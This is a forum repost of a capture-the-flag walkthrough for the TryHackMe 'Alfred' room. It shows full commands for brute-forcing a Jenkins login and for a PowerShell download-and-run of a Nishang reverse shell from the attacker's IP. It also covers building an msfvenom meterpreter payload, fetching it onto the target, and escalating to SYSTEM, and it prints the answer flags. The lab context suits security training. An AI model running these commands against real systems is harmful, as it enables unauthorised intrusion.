Create an account


Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[Tut] TryHackMe Alfred – How I Solved The Challenge [+Video]

#1
TryHackMe Alfred – How I Solved The Challenge [+Video]

<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{&quot;align&quot;:&quot;left&quot;,&quot;id&quot;:&quot;1000191&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;top&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;1&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;Rate this post&quot;,&quot;legend&quot;:&quot;5\/5 - (1 vote)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;{score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-alfred-how-i-solved-the-challenge/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FGkMOsGp6mco%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<p>In this Capture the Flag (CTF) challenge walkthrough, I’ll hack into a windows service called Jenkins, find a way to carry out Remote Command Execution (RCE) by using Metasploit to gain access to the box and escalate my privileges to the NT AUTHORITY/SYSTEM, which is the equivalent of <code>root</code> on a Windows machine. </p>
<p class="has-global-color-8-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2694.png" alt="⚔" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Challenge</strong>: I need to capture two “flags”, the <code>user.txt</code> flag and the <code>root.txt</code> flag. Let’s get started!</p>
<p>First, we’ll note down our IP addresses, export them, and run our nmap scan with the flag -Pn to skip host discovery.</p>
<h2>INITIAL ENUMERATION</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="956" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-315.png" alt="" class="wp-image-1000265" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-315.png 956w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w" sizes="(max-width: 956px) 100vw, 956px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">IPs
export myIP=10.6.2.23
export targetIP=10.10.99.176 ┌──(tester㉿box)-[~/THM]
└─$ nmap 10.10.216.90 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 22:39 EST
Nmap scan report for 10.10.216.90
Host is up (0.083s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 7.05 seconds
</pre>
<p>We see that there are three open ports. </p>
<p>There is an HTTP service running on port 80. That is presumably a website that we will look at in a moment on our browser. </p>
<p>The <code>ms-wbt-server</code> running on port 3389 looks interesting. A quick google search reveals that it has something to do with the RDP (remote desktop protocol). </p>
<p>Also, the <code>http-proxy</code> on 8080 looks intriguing. On port 80 we find a picture of batman in plainclothes. There’s not much here to see. A quick look at the source HTML code doesn’t reveal anything else interesting.</p>
<h2>HACKING JENKINS WITH BURPSUITE</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="955" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-317.png" alt="" class="wp-image-1000275" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-317.png 955w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w" sizes="(max-width: 955px) 100vw, 955px" /></figure>
</div>
<p>On port 8080, we find a login page to Jenkins.</p>
<p>Let’s take a few guesses with some of the standard factory-set passwords: <code>admin:password</code>, <code>admin:admin</code>, etc. </p>
<p>Using the proxy intercept and sending it to the intruder function, we can set up a list of passwords and usernames to try as a sniper-style attack. </p>
<p>Based on the different lengths of the responses, we can see that <code>admin:admin</code> may be our winning combination. We are in luck that this company has lazy administrators who don’t properly safeguard their business! The system lets us in as expected with <code>admin:admin</code>.</p>
<p>At TryHackMe’s suggestion, we’ll use Nishang for spawning a <code>revshell</code> from windows. Inside the Jenkins admin dashboard, we can click on project 1 and then edit configure. </p>
<p>In the last text box, we can perform remote command execution.&nbsp;</p>
<h2>USING REMOTE COMMAND EXECUTION TO SPAWN A REVSHELL PAYLOAD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="425" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-316.png" alt="" class="wp-image-1000272" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-316.png 425w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 425px) 100vw, 425px" /></figure>
</div>
<p>First, let’s spawn a reverse shell using <code>PowerShellTcp.ps1</code> from <a rel="noreferrer noopener" href="https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1" target="_blank">nishang’s git repo</a>. After downloading the file from the git repo, we launch a Netcat listener with the command:&nbsp;</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre>
<p>Then we use the following command in the last text box on Jenkins project 1 settings.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">powershell iex (New-Object Net.WebClient).DownloadString('http://10.6.2.23:8000/Invoke-PowerShellTcp.ps1'>
</pre>
<p>After clicking on “<code>build</code>” in the Jenkin’s dashboard, we catch the shell on our Netcat listener and discover the <code>user.txt</code> flag!</p>
<pre class="wp-block-preformatted"><code>!!!
<strong>user.txt:</strong>
79007a09481963edf2e1321abd9ae2a0
!!!</code>
</pre>
<h2>USING MSFVENOM TO CREATE A MALICIOUS PAYLOAD</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="425" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-318.png" alt="" class="wp-image-1000279" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-318.png 425w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 425px) 100vw, 425px" /></figure>
</div>
<p>We can create a custom malicious payload to enable us to connect to a more powerful reverse shell within Metasploit using the following command in our attack box:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 – encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=4444 -f exe -o shell.exe</pre>
<p>Now we need to start up Metasploit console:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">Msfconsole</pre>
<p>Load the meterpreter exploit/multi/handler:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">use exploit/multi/handler</pre>
<p>Set up our payload:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">set payload windows/meterpreter/reverse_tcp payload</pre>
<p>And finally, type: <code>run</code></p>
<p>First, we’ll spin up a simple HTTP server to copy <code>shell.exe</code> to windows with:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -m http.server 8000</pre>
<p>Then we can copy and run the file on the target machine by again using remote command execution via the Jenkins edit build function:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.6.2.23:8000/shell.exe','shell.exe')"</pre>
<p>And Metasploit successfully launches a new meterpreter session on the target box. If the <code>shell.exe</code> file is grabbed successfully from the HTTP server (code 200), but no meterpreter shell is spawned, we can use one more Jenkins RCE to run the revshell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">./shell.exe</pre>
<h2>PRIVILEGE ESCALATION TO ROOT</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="956" height="637" src="https://blog.finxter.com/wp-content/uploads/2022/12/image-319.png" alt="" class="wp-image-1000292" srcset="https://blog.finxter.com/wp-content/uploads/2022/12/image-319.png 956w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w" sizes="(max-width: 956px) 100vw, 956px" /></figure>
</div>
<p>First, we issue the following command in our meterpreter to automatically escalate to the highest privilege possible:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">getsystem</pre>
<p>We now operate with NT AUTHORITY/SYSTEM privileges for most things, but not every single command. To fix this, we can migrate to another process on the target machine. </p>
<p>Entering the command “<code>ps</code>” will give us a list of processes. We’ll use the process <code>system.exe</code> with the following command:</p>
<p><code>migrate &lt;PID&gt;</code> (process id of the target process running by NT AUTHORITY/SYSTEM, in this case <code>system.exe</code>)</p>
<p>Now we are running metasploit in the RAM of our target machine on the <code>system.exe</code> process. We have full NT AUTHORITY/SYSTEM privileges and can easily find <code>root.txt</code> with the following command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">find -f root.txt cat root.txt
��dff0f748678f280250f25a45b8046b4a
</pre>
<p>Thanks for reading/watching my walkthrough. <img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f64f.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
</div>


https://www.sickgaming.net/blog/2022/12/...nge-video/
Reply



Forum Jump:


Users browsing this thread:
2 Guest(s)

Forum software by © MyBB Theme © iAndrew 2016